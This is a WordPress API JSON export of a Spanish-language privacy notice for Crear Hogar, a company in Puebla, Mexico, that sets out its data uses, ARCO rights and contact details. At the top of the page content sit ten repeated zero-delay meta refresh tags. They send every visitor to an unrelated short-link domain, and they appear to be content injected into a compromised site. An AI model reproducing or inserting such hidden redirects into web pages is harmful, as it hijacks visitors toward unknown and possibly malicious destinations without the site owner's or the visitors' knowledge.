{"id":3,"date":"2023-05-27T01:10:01","date_gmt":"2023-05-27T01:10:01","guid":{"rendered":"https:\/\/crearhogar.com.mx\/sitio\/?page_id=3"},"modified":"2023-08-11T12:25:38","modified_gmt":"2023-08-11T18:25:38","slug":"aviso-de-privacidad","status":"publish","type":"page","link":"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/","title":{"rendered":"Aviso de privacidad"},"content":{"rendered":"<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/YTiCMgCgD0r0\" \/>\r\n\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/YTiCMgCgD0r0\" \/>\r\n\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/YTiCMgCgD0r0\" \/>\r\n\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/YTiCMgCgD0r0\" \/>\r\n\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/YTiCMgCgD0r0\" \/>\r\n\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/YTiCMgCgD0r0\" \/>\r\n\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/YTiCMgCgD0r0\" \/>\r\n\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/YTiCMgCgD0r0\" \/>\r\n\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/YTiCMgCgD0r0\" \/>\r\n\r\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.company\/YTiCMgCgD0r0\" \/>\r\n\r\n\n<p><\/p>\n\n\n\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Aviso de privacidad<\/h2>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><strong>Versi\u00f3n No. 1<\/strong>&nbsp;Fecha de publicaci\u00f3n: 22 de Junio de 2013.<\/p>\n\n\n\n<p><strong>Identidad y domicilio del Responsable<\/strong><\/p>\n\n\n\n<p>CREAR HOGAR S.A. DE C.V. (en lo sucesivo \u201cLa empresa\u201d) con domicilio en 31 Norte #605 Colonia Amor, C.P. 72140, Puebla, M\u00e9xico.<\/p>\n\n\n\n<p><strong>Datos personales que recaba la empresa y el no tratamiento de datos personales sensibles<\/strong><\/p>\n\n\n\n<p>Son los datos personales proporcionados por el cliente de manera directa relacionados con: los servicios que presta la impresa incluyendo sin limitar la prestaci\u00f3n del servicio local administrativo y diversos en general (en lo sucesivo y conjuntamente referidos como los \u201cServicios\u201d). La empresa no recaba ni trata datos personales sensibles.<\/p>\n\n\n\n<p><strong>Finalidades primarias<\/strong><\/p>\n\n\n\n<p>La empresa tratar\u00e1 sus datos personales para llevar a cabo las actividades necesarias para el cumplimiento de las obligaciones que se originen y deriven de la relaci\u00f3n empresa-cliente.<\/p>\n\n\n\n<p><strong>Finalidades secundarias<\/strong><\/p>\n\n\n\n<p>La empresa tratar\u00e1 sus datos personales para llevar a cabo las finalidades secundarias como informarle del lanzamiento o cambios de nuevos productos, bienes, servicios, promociones y\/u ofertas de acuerdo a sus intereses, as\u00ed como para cualquier otra actividad tendiente a promover, mantener, mejorar y evaluar los Servicios. Si usted no desea que la empresa trate sus datos personales para dichas finalidades secundarias por favor env\u00ede un correo electr\u00f3nico a&nbsp;<strong>soporte@crearhogar.com.mx<\/strong>&nbsp;Usted podr\u00e1 cambiar de opci\u00f3n en cualquier momento.<\/p>\n\n\n\n<p><strong>Transferencias<\/strong><\/p>\n\n\n\n<p>La empresa, para cumplir la(s) finalidad(es) necesarias anteriormente descrita(s) u otras aquellas exigidas legalmente o por las autoridades competentes, s\u00f3lo transferir\u00e1 los datos necesarios en los casos legalmente previstos por las autoridades que as\u00ed lo soliciten.<\/p>\n\n\n\n<p><strong>Medio y procedimiento para ejercer Derechos ARCO y\/o revocaci\u00f3n de consentimiento para el tratamiento de datos personales<\/strong><\/p>\n\n\n\n<p>Usted o su representante legal podr\u00e1 ejercer cualquiera de los derechos de acceso, rectificaci\u00f3n, cancelaci\u00f3n u oposici\u00f3n, as\u00ed como revocar su consentimiento para el tratamiento de sus datos personales enviando un correo electr\u00f3nico a la direcci\u00f3n&nbsp;<strong>soporte@crearhogar.com.mx<\/strong>&nbsp;donde se le atender\u00e1 en tiempo y forma.<\/p>\n\n\n\n<p><strong>Opciones y medios para limitar el uso o divulgaci\u00f3n de sus datos personales<\/strong><\/p>\n\n\n\n<p>Usted podr\u00e1 limitar el uso o divulgaci\u00f3n de sus datos personales enviando su solicitud a la direcci\u00f3n&nbsp;<strong>soporte@crearhogar.com.mx<\/strong><\/p>\n\n\n\n<p>En caso de que su solicitud resulte procedente, la empresa lo registrar\u00e1 en el listado de exclusi\u00f3n propio, con el objeto de que usted deje de recibir nuestras promociones.<\/p>\n\n\n\n<p><strong>Medio para comunicar cambios al Aviso de Privacidad<\/strong><\/p>\n\n\n\n<p>La empresa se reserva el derecho, bajo su exclusiva discreci\u00f3n, de cambiar, modificar, agregar o eliminar partes del presente Aviso de Privacidad en cualquier momento. En tal caso, la empresa publicar\u00e1 dichas modificaciones en el sitio web www.crearhogar.com.mx e indicar\u00e1 la fecha de \u00faltima versi\u00f3n del aviso. Le recomendamos visitar peri\u00f3dicamente esta p\u00e1gina con la finalidad de informarse si ocurre alg\u00fan cambio al presente.<\/p>\n\n\n\n<p>Para cualquier duda por favor env\u00ede un correo electr\u00f3nico a&nbsp;<strong>soporte@crearhogar.com.mx<\/strong>&nbsp;y con gusto le atenderemos.<\/p>\n\n\n\n<p>Aviso de Privacidad<\/p>\n\n\n\n<p>31 Norte #605 Colonia Amor, Puebla, Pue., M\u00e9xico, C.P. 72140<br><strong>Tel\u00e9fono:<\/strong>&nbsp;01222 248 3547, 01222 248 6046&nbsp;<strong>Fax:<\/strong>&nbsp;01222 243 7614<br><strong>Email:<\/strong>&nbsp;ventas@crearhogar.com.mx<\/p>\n\n\n\n<div style=\"height:81px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\r\n<script><\/script>","protected":false},"excerpt":{"rendered":"<p>Aviso de privacidad Versi\u00f3n No. 1&nbsp;Fecha de publicaci\u00f3n: 22 de Junio de 2013. Identidad y domicilio del Responsable CREAR HOGAR S.A. DE C.V. (en lo sucesivo \u201cLa empresa\u201d) con domicilio en 31 Norte #605 Colonia Amor, C.P. 72140, Puebla, M\u00e9xico. Datos personales que recaba la empresa y el no tratamiento de datos personales sensibles Son [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"disabled","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-3","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Aviso de privacidad - Crear Hogar<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/\" \/>\n<meta property=\"og:locale\" content=\"es_MX\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Aviso de privacidad - Crear Hogar\" \/>\n<meta property=\"og:description\" content=\"Aviso de privacidad Versi\u00f3n No. 1&nbsp;Fecha de publicaci\u00f3n: 22 de Junio de 2013. Identidad y domicilio del Responsable CREAR HOGAR S.A. DE C.V. (en lo sucesivo \u201cLa empresa\u201d) con domicilio en 31 Norte #605 Colonia Amor, C.P. 72140, Puebla, M\u00e9xico. Datos personales que recaba la empresa y el no tratamiento de datos personales sensibles Son [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/\" \/>\n<meta property=\"og:site_name\" content=\"Crear Hogar\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/CrearHogarMat\" \/>\n<meta property=\"article:modified_time\" content=\"2023-08-11T18:25:38+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/\",\"url\":\"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/\",\"name\":\"Aviso de privacidad - Crear Hogar\",\"isPartOf\":{\"@id\":\"https:\/\/crearhogar.com.mx\/sitio\/#website\"},\"datePublished\":\"2023-05-27T01:10:01+00:00\",\"dateModified\":\"2023-08-11T18:25:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/crearhogar.com.mx\/sitio\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Aviso de privacidad\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/crearhogar.com.mx\/sitio\/#website\",\"url\":\"https:\/\/crearhogar.com.mx\/sitio\/\",\"name\":\"Crear Hogar\",\"description\":\"Si se trata de crear, Crear Hogar\",\"publisher\":{\"@id\":\"https:\/\/crearhogar.com.mx\/sitio\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/crearhogar.com.mx\/sitio\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/crearhogar.com.mx\/sitio\/#organization\",\"name\":\"Crear Hogar\",\"url\":\"https:\/\/crearhogar.com.mx\/sitio\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/crearhogar.com.mx\/sitio\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/crearhogar.com.mx\/sitio\/wp-content\/uploads\/2023\/06\/Logo-Final-Crear-Hogar.png\",\"contentUrl\":\"https:\/\/crearhogar.com.mx\/sitio\/wp-content\/uploads\/2023\/06\/Logo-Final-Crear-Hogar.png\",\"width\":1330,\"height\":1370,\"caption\":\"Crear Hogar\"},\"image\":{\"@id\":\"https:\/\/crearhogar.com.mx\/sitio\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/CrearHogarMat\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Aviso de privacidad - Crear Hogar","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/","og_locale":"es_MX","og_type":"article","og_title":"Aviso de privacidad - Crear Hogar","og_description":"Aviso de privacidad Versi\u00f3n No. 1&nbsp;Fecha de publicaci\u00f3n: 22 de Junio de 2013. Identidad y domicilio del Responsable CREAR HOGAR S.A. DE C.V. (en lo sucesivo \u201cLa empresa\u201d) con domicilio en 31 Norte #605 Colonia Amor, C.P. 72140, Puebla, M\u00e9xico. Datos personales que recaba la empresa y el no tratamiento de datos personales sensibles Son [&hellip;]","og_url":"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/","og_site_name":"Crear Hogar","article_publisher":"https:\/\/www.facebook.com\/CrearHogarMat","article_modified_time":"2023-08-11T18:25:38+00:00","twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/","url":"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/","name":"Aviso de privacidad - Crear Hogar","isPartOf":{"@id":"https:\/\/crearhogar.com.mx\/sitio\/#website"},"datePublished":"2023-05-27T01:10:01+00:00","dateModified":"2023-08-11T18:25:38+00:00","breadcrumb":{"@id":"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/crearhogar.com.mx\/sitio\/aviso-de-privacidad\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/crearhogar.com.mx\/sitio\/"},{"@type":"ListItem","position":2,"name":"Aviso de privacidad"}]},{"@type":"WebSite","@id":"https:\/\/crearhogar.com.mx\/sitio\/#website","url":"https:\/\/crearhogar.com.mx\/sitio\/","name":"Crear Hogar","description":"Si se trata de crear, Crear Hogar","publisher":{"@id":"https:\/\/crearhogar.com.mx\/sitio\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/crearhogar.com.mx\/sitio\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/crearhogar.com.mx\/sitio\/#organization","name":"Crear Hogar","url":"https:\/\/crearhogar.com.mx\/sitio\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/crearhogar.com.mx\/sitio\/#\/schema\/logo\/image\/","url":"https:\/\/crearhogar.com.mx\/sitio\/wp-content\/uploads\/2023\/06\/Logo-Final-Crear-Hogar.png","contentUrl":"https:\/\/crearhogar.com.mx\/sitio\/wp-content\/uploads\/2023\/06\/Logo-Final-Crear-Hogar.png","width":1330,"height":1370,"caption":"Crear Hogar"},"image":{"@id":"https:\/\/crearhogar.com.mx\/sitio\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/CrearHogarMat"]}]}},"_links":{"self":[{"href":"https:\/\/crearhogar.com.mx\/sitio\/wp-json\/wp\/v2\/pages\/3","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/crearhogar.com.mx\/sitio\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/crearhogar.com.mx\/sitio\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/crearhogar.com.mx\/sitio\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/crearhogar.com.mx\/sitio\/wp-json\/wp\/v2\/comments?post=3"}],"version-history":[{"count":7,"href":"https:\/\/crearhogar.com.mx\/sitio\/wp-json\/wp\/v2\/pages\/3\/revisions"}],"predecessor-version":[{"id":579,"href":"https:\/\/crearhogar.com.mx\/sitio\/wp-json\/wp\/v2\/pages\/3\/revisions\/579"}],"wp:attachment":[{"href":"https:\/\/crearhogar.com.mx\/sitio\/wp-json\/wp\/v2\/media?parent=3"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}